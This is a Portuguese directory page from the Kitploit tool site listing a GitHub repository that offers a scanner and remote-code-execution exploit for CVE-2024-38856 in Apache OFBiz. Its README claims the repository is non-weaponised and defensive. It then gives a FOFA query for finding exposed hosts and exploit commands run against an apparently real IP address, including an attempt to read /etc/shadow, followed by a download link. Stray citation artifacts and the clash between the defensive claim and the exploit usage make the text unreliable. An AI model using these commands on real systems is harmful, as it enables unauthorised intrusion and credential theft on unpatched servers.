Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: Scanner & Exploit de execução remota de código do Apache OFBiz

Ver Repositório
33há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-38856 — Apache OFBiz (Documentação do repositório)

Propósito do repositório: documentação informativa sobre a CVE-2024-38856 (autorização incorreta / RCE pré-autenticação no Apache OFBiz).
Este repositório não contém código de exploit armamentizado. Destina-se somente a pesquisa defensiva, orientações de correção (patching), detecção e testes seguros em laboratório.


Visão geral

A CVE-2024-38856 é uma vulnerabilidade de autorização incorreta no Apache OFBiz que pode permitir acesso não autenticado a determinados endpoints e, sob condições específicas, possibilitar a execução de código de renderização de telas, o que pode levar à execução remota de código nos sistemas afetados. O problema foi corrigido no Apache OFBiz 18.12.15; versões anteriores até 18.12.14 são afetadas. :contentReference[oaicite:0]{index=0}

Gravidade / Impacto: diversos fornecedores de segurança e pesquisadores classificaram esta vulnerabilidade como crítica — ela pode levar à execução remota de código sem autenticação em instâncias vulneráveis e já foi observada em tentativas ativas de exploração no ambiente real (in the wild). Os administradores devem tratar as instâncias OFBiz expostas como itens de remediação de alta prioridade. :contentReference[oaicite:1]{index=1}


Versões afetadas

  • Apache OFBiz: até 18.12.14 (ou seja, todas as versões <= 18.12.14 são consideradas vulneráveis). O problema foi corrigido na versão 18.12.15. Recomenda-se a atualização. :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"
Captura de tela 2025-10-10 183057

Exploit:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

Captura de tela 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

Captura de tela 2025-10-10 075018
Baixar ferramenta